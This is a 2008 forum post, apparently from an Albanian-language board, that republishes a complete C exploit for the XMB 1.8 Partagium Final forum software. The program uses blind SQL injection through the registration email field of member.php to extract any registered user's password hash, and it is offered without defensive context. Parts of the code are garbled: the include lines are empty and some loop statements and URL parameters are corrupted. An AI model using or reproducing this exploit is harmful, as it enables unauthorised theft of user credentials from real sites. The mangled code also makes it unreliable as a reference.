BigYy Designer
Numri i postimeve : 144 Registration date : 12/04/2008
| Titulli: ..:[ exmb.c - XMB 1.8 Partagium Final exploit ]:.. Sat 12 Apr 2008 - 13:19 | |
| /* * exmb.c - XMB 1.8 Partagium Final exploit * * Steals password hashes from any registered user * * http://www.bbugs.org*/ #include #include #include #include #include #include #include #include #include #include #include
#define USERAGENT "Mozilla/4.75" #define SCRIPT "member.php"
void safe_send(int, void *, size_t, int); void safe_recv(int, void *, size_t, int); void resolve_host(struct sockaddr *, char *); char *get_members_table(struct sockaddr_in); int get_err_page_size(struct sockaddr_in); void usage(); void do_it();
char hexchars[]= { '0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f' };
char *argv0, *target_host, *user, *path; unsigned short target_port, beginchar, endchar;
int main(int argc, char **argv) { int ch;
argv0 = argv[0]; user = path = NULL; target_port = 80; beginchar = 1; endchar = 32;
while ((ch = getopt(argc, argv, "b:e:hp:u:")) != -1) {
switch (ch) { case 'b': beginchar = atoi(optarg); break; case 'e': endchar = atoi(optarg); break; case 'p': path = optarg; break; case 'u': user = optarg; break; case 'h': case '?': default: usage(); } }
argc-=optind; argv+=optind;
if (argc > 1) target_port = atoi(argv[1]); if (argc > 0) target_host = argv[0]; else usage();
if (!path) { printf("you must specify a path\n"); exit(1); } if (!user) { printf("you must specify an user\n"); exit(1); }
do_it();
return 0; }
void do_it() { char *table; struct sockaddr_in sa; int s, c, spread, pos, i, err_sz, sz; char buf[31337], email2[20000], hash[33], *p;
resolve_host((struct sockaddr *)&sa, target_host); sa.sin_port = htons(target_port);
printf("\nAttacking %s:%d (%s)\n\n", target_host, target_port, inet_ntoa(sa.sin_addr));
printf("Using script path: %s/%s\n", path, SCRIPT); err_sz = get_err_page_size(sa); printf("Got error page size: %d bytes\n", err_sz);
table = get_members_table(sa); printf("Got members table: %s\n", table);
printf("This may take a while...\n\n");
printf("* %s's password hash: ", user); fflush(stdout);
for (c=beginchar; c<=endchar; c++) {
for (spread=8,pos=0; spread; spread/=2) { sprintf(email2, "+and(");
for (i=0; isprintf(email2, "%s+mid(%s.password,%d,1)=char(%d)", email2, table, c, hexchars[pos+i]);
if (istrcat(email2, "+or"); else strcat(email2, ")"); }
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); }
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("connect"); exit(1); }
sprintf(buf, "GET %s/%s?action=reg®submit=1&email2=%s&username=%s HTTP/1.1\r\n" "Host: %s\r\n" "Content-type: application/x-www-form-urlencoded\r\n" "User-Agent: %s\r\n" "Connection: close\r\n\r\n", path, SCRIPT, email2, user, target_host, USERAGENT);
safe_send(s, buf, strlen(buf), 0); memset(buf,0,sizeof(buf)); safe_recv(s, buf, sizeof(buf), 0);
if (!(p = strstr(buf, "\r\n\r\n"))) { printf("something failed\n"); exit(1); } sz = strlen(p)-4; if (sz == err_sz) { if (spread == 1) { hash[c] = hexchars[pos]; } } else { if (spread == 1) { hash[c] = hexchars[pos+spread]; } pos += spread; } close(s); } printf("%c", hash[c]); fflush(stdout); } printf("\n\nDone.\n"); }
char *get_members_table(struct sockaddr_in sa) { static char members_table[64]; char buf[1024], *p, *q; int s;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("connect"); exit(1); } sprintf(buf, "GET %s/%s?action=reg®submit=1&email1=+FROM HTTP/1.1\r\n" "Host: %s\r\n" "Content-type: application/x-www-form-urlencoded\r\n" "User-Agent: %s\r\n" "Connection: close\r\n" "\r\n", path, SCRIPT, target_host, USERAGENT); safe_send(s, buf, strlen(buf), 0); safe_recv(s, buf, sizeof(buf), 0);
if (!((p = strstr(buf, "FROM "))) || !((q = strstr((p+5), " WHERE")))) { printf("cant get members table. maybe wrong path?\n"); exit(1); } *q = '\0'; strcpy(members_table, p+5);
close(s); return members_table; }
int get_err_page_size(struct sockaddr_in sa) { char buf[20000], *p; int s, sz;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("connect"); exit(1); } sprintf(buf, "GET %s/%s?action=reg®submit=1&username=%s HTTP/1.1\r\n" "Host: %s\r\n" "Content-type: application/x-www-form-urlencoded\r\n" "User-Agent: %s\r\n" "Connection: close\r\n" "\r\n", path, SCRIPT, user, target_host, USERAGENT); safe_send(s, buf, strlen(buf), 0); safe_recv(s, buf, sizeof(buf), 0);
if (!(p = strstr(buf, "\r\n\r\n"))) { printf("cant get error page\n"); exit(1); } sz = strlen(p)-4;
close(s); return sz; }
void resolve_host(struct sockaddr *addr, char *hostname) { struct hostent *hent; struct sockaddr_in *address;
address = (struct sockaddr_in *)addr; bzero((void *)address, sizeof(struct sockaddr_in));
hent = gethostbyname(hostname); if (hent) { address->sin_family = hent->h_addrtype; memcpy(&address->sin_addr, hent->h_addr, hent->h_length); } else { address->sin_family = AF_INET; address->sin_addr.s_addr = inet_addr(hostname); if (address->sin_addr.s_addr == -1) { printf("unknown host: %s\n", hostname); exit(1); } } }
void safe_recv(int s, void *buf, size_t len, int flags) { int ret, received=0;
do { ret = recv(s,buf+received,len-received,flags); switch(ret) { case -1: perror("recv"); exit(1); default: received+=ret; } } while(ret); }
void safe_send(int s, void *buf, size_t len, int flags) { int ret, sent=0;
do { ret = send(s,buf+sent,len-sent,flags); switch(ret) { case -1: perror("send"); exit(1); default: sent+=ret; } } while(ret); }
void usage() { fprintf(stderr, "Usage: %s <-p path> <-u user> [-b beginchar] [-e endchar] [port]\n\n" , argv0); exit(1); } | |
|